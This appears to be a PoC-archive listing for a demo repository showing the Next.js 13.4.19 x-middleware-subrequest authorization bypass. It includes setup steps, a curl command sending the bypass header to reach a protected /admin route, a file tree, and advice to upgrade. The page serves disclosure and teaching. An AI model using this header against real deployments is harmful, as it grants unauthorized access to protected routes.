关联漏洞
介绍
# Next.js Authorization Bypass Demo
This application demonstrates the x-middleware-subrequest vulnerability in Next.js 13.4.19, which allows bypassing middleware protection.
## Setup
1. Install dependencies:
```bash
npm install
```
2. Start the development server:
```bash
npm run dev
```
## Vulnerability Demonstration
The application has an admin page at `/admin` that should be protected by middleware. However, it can be accessed without authentication using the x-middleware-subrequest header.
### Normal Flow
1. Visit `/admin` - You will be redirected to `/login`
2. Log in with any credentials - You will be redirected to `/admin`
### Bypass Method
To bypass the authentication, you can use curl or any HTTP client to make a request with the x-middleware-subrequest header:
```bash
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
```
## Security Implications
This vulnerability demonstrates how middleware protection can be bypassed in Next.js 13.4.19 by using the x-middleware-subrequest header. In a production environment, this could allow unauthorized access to protected routes.
## Fix
To fix this vulnerability, upgrade to a newer version of Next.js where this issue has been patched.
文件快照
[4.0K] /data/pocs/9e462efb2182d79fcd2651ea7b989733d6942196
├── [4.0K] app
│ ├── [4.0K] admin
│ │ └── [ 911] page.tsx
│ ├── [ 59] globals.css
│ ├── [ 488] layout.tsx
│ └── [4.0K] login
│ └── [2.0K] page.tsx
├── [1.1K] middleware.ts
├── [656K] morpheus.gif
├── [ 534] package.json
├── [ 71K] package-lock.json
├── [ 82] postcss.config.js
├── [1.2K] README.md
├── [ 253] tailwind.config.js
└── [ 581] tsconfig.json
3 directories, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。